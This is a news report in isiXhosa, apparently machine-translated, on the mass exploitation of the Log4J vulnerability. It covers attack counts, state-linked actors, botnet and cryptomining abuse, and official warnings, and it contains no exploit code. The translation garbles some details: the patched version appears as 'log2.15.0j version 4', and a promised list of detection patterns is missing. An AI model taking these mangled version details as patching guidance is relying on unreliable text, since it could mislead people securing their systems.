Mva nje siye saphawula ngokusilela kweLog4J kwaye kolu papasho singathanda ukwabelana ngolwazi oluthi baphandi, ukususela ibango lokuba abarhwebi, kubandakanywa amaqela axhaswa ngurhulumente waseTshayina kodwa kwanayiRussia, baqalise uhlaselo olungaphezulu kwama-840.000. ngokuchasene neenkampani kwihlabathi jikelele ukusukela ngolwesiHlanu odlulileyo ngobu sesichengeni.
Iqela le-cybersecurity Check Point uthe uhlaselo ezinxulumene kunye nokuba sesichengeni kuye kwanda kwiiyure ze-72 ukususela ngoLwesihlanu, kwaye ngamanye amaxesha abaphandi bayo babebona ngaphezu kwe-100 yokuhlaselwa ngomzuzu.
Umhleli ukwaphawule ubuchule obukhulu bokulungelelanisa uhlaselo. Ngamanye amaxesha iinguqulelo ezintsha ezingaphezulu kwama-60 zivela ngaphantsi kweeyure ezingama-24, zizisa iindlela ezintsha zokubethelela okanye ukukhowuda.
"Abahlaseli bakarhulumente waseTshayina" bakhankanywa njengababandakanyiweyo, ngokutsho kukaCharles Carmakal, igosa eliyintloko letekhnoloji yenkampani ye-cyber Mandiant.
Isiphene se-Log4J sivumela abahlaseli ukuba bathathe ulawulo olukude lweekhompyuter eziqhuba usetyenziso lweJava.
Jen ngasempumalanga, umlawuli we-United States Cyber and Infrastructure Security Agency (CISA), sitsho kubaphathi beshishini ukuba Ukuba semngciphekweni "yenye yezona zinto zinzima endizibonileyo kuwo wonke umsebenzi wam, ukuba abukho kakhulu," ngokutsho kwamajelo eendaba aseMelika. Amakhulu ezigidi zezixhobo ezinokuthi zichaphazeleke, utshilo.
I-Check Point yathi kwiimeko ezininzi, abahlaseli bathatha iikhomputha kwaye bazisebenzise emigodini ye-cryptocurrencies okanye babe yinxalenye ye-botnets, kunye nothungelwano olukhulu lwekhompyutha olunokusetyenziswa ukugqithisa i-website traffic, ukuthumela i-spam, okanye ezinye iinjongo ezingekho mthethweni.
KwiKaspersky, uninzi lohlaselo luvela eRashiya.
I-CISA kunye ne-UK yeSizwe ye-Cyber Security Centre ikhuphe izilumkiso ezikhuthaza imibutho ukuba yenze uhlaziyo olunxulumene nokuba sesichengeni kwe-Log4J, njengoko iingcali zizama ukuvavanya iziphumo.
IAmazon, iApple, i-IBM, iMicrosoft, kunye neCisco ziphakathi kwezo zingxameleyo ukukhupha izisombululo, kodwa akukho lwaphulo lunzulu lubikiweyo esidlangalaleni kude kube.
Ukuba sesichengeni kokwamva nje ukuchaphazela uthungelwano lwamashishini, emva kokuba ubuthathaka buvele kulo nyaka uphelileyo kwisoftware esetyenziswayo eqhelekileyo evela kuMicrosoft kunye nenkampani yekhompyuter iSolarWinds. Bobabini ubuthathaka kuxelwe ukuba baqale baxhatshazwa ngamaqela eentlola axhaswa ngurhulumente asuka eTshayina naseRussia, ngokulandelelanayo.
UMandiant's Carmakal uthe abadlali baseTshayina abaxhaswa ngurhulumente bazama ukuxhaphaza i-Log4J bug, kodwa walile ukwabelana ngeenkcukacha ezithe vetshe. Abaphandi beSentinelOne baxelele amajelo eendaba ukuba baye babona abaqweqwedisi baseTshayina bethatha ithuba lokuba sesichengeni.
I-CERT-FR icebisa uhlalutyo olucokisekileyo lwelog zenethiwekhi. Ezi zizathu zilandelayo zingasetyenziselwa ukuchonga umzamo wokusebenzisa obu buthathaka xa usetyenziswa kwii-URLs okanye iiheader ezithile zeHTTP njenge-arhente yomsebenzisi.
Kucetyiswa ngamandla ukuba usebenzise log2.15.0j version 4 ngokukhawuleza. Nangona kunjalo, kwimeko yobunzima bokufudukela kule nguqulo, ezi zisombululo zilandelayo zinokusetyenziswa okwethutyana:
Kwizicelo ezisebenzisa iinguqulelo 2.7.0 kwaye kamva kwilayibrari yelog4j, kuyenzeka ukukhusela kulo naluphi na uhlaselo ngokulungisa ifomathi yeziganeko eziya kulogishwa nge syntax% m {nolookups} yedatha enokuthi inikezelwe ngumsebenzisi. .
Phantse isiqingatha salo lonke uhlaselo lwenziwe ngabahlaseli be-cyber abaziwayo, ngokutsho kweCheck Point. Ezi ziquka amaqela asebenzisa i-tsunami kunye ne-Mirai, i-malware eguqula izixhobo zibe yi-botnets, okanye iinethiwekhi ezisetyenziselwa ukuqalisa ukuhlaselwa okulawulwa kude, njengokukhanyela ukuhlaselwa kwenkonzo. Kwakhona kwakuquka amaqela asebenzisa i-XMRig, isofthiwe esebenzisa imali yedijithali ye-Monero.
"Ngalo mngcipheko, abahlaseli bafumana amandla angenasiphelo: banokukhupha idatha eyimfihlo, balayishe iifayile kwiseva, bacime idatha, bafake i-ransomware okanye batshintshele kwezinye iiseva," watsho uNicholas Sciberras, igosa eliyintloko lobunjineli be-Acunetix, iskena sobungozi. "Kwakulula ngokumangalisayo" ukuphumeza uhlaselo, watsho, esongeza ukuba isiphene "siya kusetyenziswa kwiinyanga ezimbalwa ezizayo."